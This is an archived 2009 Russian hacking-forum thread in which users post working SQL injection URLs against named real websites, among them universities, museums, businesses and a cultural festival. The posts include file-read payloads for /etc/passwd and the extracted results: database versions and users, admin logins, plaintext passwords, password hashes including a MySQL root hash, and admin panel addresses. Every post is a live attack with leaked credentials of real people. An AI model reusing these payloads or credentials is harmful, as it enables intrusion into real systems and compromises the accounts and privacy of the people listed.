ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8651  
Старый 31.03.2009, 13:18
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<ГК Международный институт менеджмента>>
Код:
http://www.gkmim.ru/index.php?area=table&shose=-1'+union+select+1,concat_ws(0x20,version(),database(),user())--+
db: 5.0.76
name_db: gkmim
user: gkmim@localhost
http://www.gkmim.ru/admin/


table: phpbb_users
log: gkmim-admin
pas: 991c1e56f1c6e0c03c72bf95611194de
users:
log: Марина
pas: 123
+limit+x,x--+
 
Ответить с цитированием

  #8652  
Старый 31.03.2009, 17:05
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

Код:
http://s1701.zouo.ru/site.php?id=-34+union+select+unhex(hex(version())),2,3--+
db: 4.1.16-nt
name_db: s1701
user: s1701@localhost
http://s1701.zouo.ru/manager/

table: phpbb_users

log: nachalka
pas: 1701nachalka

Последний раз редактировалось jokester; 31.03.2009 в 19:27..
 
Ответить с цитированием

  #8653  
Старый 31.03.2009, 19:11
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

Target: www.cbc.bb

Evil link: http://www.cbc.bb/index.pl/article?id=-1+union+select+1,2,version(),user(),5,6,7,database (),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37

version: 4.0.27-standard-log
user: csite28@AdServNode1
database: csite28_CPSG


Читаем локальные файлы:
http://www.cbc.bb/index.pl/article?id=-1+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37

Последний раз редактировалось InFlame; 31.03.2009 в 19:38..
 
Ответить с цитированием

  #8654  
Старый 31.03.2009, 20:07
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию

Код:
http://www.audepp.org/boxSeccion.php?id=106+and+substring(version(),1,1)=4
Код:
http://www.photos-gallery.net/subcategory.php?id=-1012+union+select+version()--
Код:
http://www.sai.org.uy/website/iframes/novedad_ampliada.php?id=-44+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
 
Ответить с цитированием

  #8655  
Старый 31.03.2009, 21:12
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.ccaabelem.com.br/?pg=conteudoq&id=7987986491+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 ,10,11--

Database Version: 5.0.22
Database name: ccaabelem
User name: ccaabelem@189-38-86-3.net2.com.br




Администраторы

Цитата:
http://www.ccaabelem.com.br/?pg=conteudoq&id=7987986491+UNION+SELECT+1,CONCAT( 0x3a,(SELECT+CONCAT(id_admin,0x3a,nome,0x3a,logina ,0x3a,senhaa,0x3a,privilegios)+FROM+ccaabelem.admi nistrador+LIMIT+0,1),0x3a),3,4,5,6,7,8,9,10,11--

id_admin : nome : logina : senhaa : privilegios

:1 : Eugenio Augusto : guto :fgjasd : 1
:2 : Max:max : 34513451 : 2
:5 : douglas : douglas : 32451242:4
:4 : FABRIZIO : fabrizio rado:1
:8 : polyanna : polyanna :2341234:4




Цитата:
http://www.ceci-br.org/novo/revista/printarticle.php?id=37+union+select+version(),user (),database(),4,5--&layout=html

Version: 4.0.27-locaweb-log
User: ceci_br1@200.234.200.80
Database: ceci_br1
 
Ответить с цитированием

  #8656  
Старый 31.03.2009, 21:45
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

Код:
http://www.bmwstyle.ru/bmw.php?id=-138+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8--+
db:5.0.67-0ubuntu6
name_db: www_bmwstyle_ru
user: bmwstyle@localhost

log: Admin
pass: admin123
 
Ответить с цитированием

  #8657  
Старый 31.03.2009, 23:31
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

innovations-forum-rodgau.de

Код:
http://www.innovations-forum-rodgau.de/memberinfo.php?id=-1+union+all+select+0,convert(version()+using+latin1),convert(database()+using+latin1),3,convert(user()+using+latin1),5,6,7,8,9,10,11,12,13,14--
юзер/версия/бд:
Код:
ifr@localhost:4.1.11-Debian_4sarge7-log:ifr_db
---------------------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8658  
Старый 01.04.2009, 00:07
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://loonen.fmns.rug.nl/arcticstation/weblog.php?nr=111+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11
version():5.0.51a-3ubuntu5.4-log
database():loonenmsql1
user():loonenmsql1@localhost

Код:
http://loonen.fmns.rug.nl/arcticstation/weblog.php?nr=111+union+select+1,2,3,4,5,6,7,8,9,10,11+from+user
__
Код:
http://www.dromedaris.nl/link.php?id=1267+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6+limit+1,1/*
version():4.1.20-log
database():dromedaris
user():dromed@localhost
__
Код:
http://scriptorium.serve-it.nl/view.php?sid=40+union+select+1,2,3,4,5,6,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():4.1.12-standard
database():serve_scriptorium
user():serve_serve@localhost

Код:
http://scriptorium.serve-it.nl/view.php?sid=40+union+select+1,2,3,4,5,6,unhex(hex(concat(email,0x3a,password))),8,9,10,11,12,13,14,15,16,17,18,19+from+scriptorium_users+limit+1,1/*
rembo@serve-it.nl:1ed8b85b1aee78c5

Код:
http://scriptorium.serve-it.nl/login.php
___
Код:
http://www.dho.nl/index.php?mid=2+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16+limit+1,1
version():5.0.51a-24-log
database():dho_nl
user():dho@hostingnode3.lan
__
Код:
http://www.brusselsmuseums.be/en/brusscard/participants.php?mid=25+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():5.0.32-Debian_7etch8
database():bmuseum
user():pointbe@localhost
__
Код:
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11+limit+1,1
version():4.1.22-standard-log
database():joodscultuurfestival
user():detrezl@213.193.229.176

Код:
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(id,0x3a,user,0x3a,pass),6,7,8,9,10,11+from+admin+limit+1,1/*
1:lev:b59c67bf196a4758191e42f76670ceba

Код:
http://www.joodscultuurfestival.be/admin/
___

Код:
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+limit+1,1/*
version():5.0.27
database():IIHE
user():root@localhost

Код:
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*
root:710789ba2a55b808
 
Ответить с цитированием

  #8659  
Старый 01.04.2009, 00:08
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.shipfinance.bm/index.php?id=462+AND+SUBSTRING((y() ),1,1)=x-- &pressrelease=1273904.html

y1=version
y2=database
y3=user

x=Version : 5.1.31-community
Database : OFR_shipfinance1208
User : shipfinance1208@localhost
 
Ответить с цитированием

  #8660  
Старый 01.04.2009, 00:15
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.bildstein-bueros.de/www/startnext/pop.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
юзер/версия/бд:

Код:
4.0.15-log:dom2671@localhost:dom2671
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ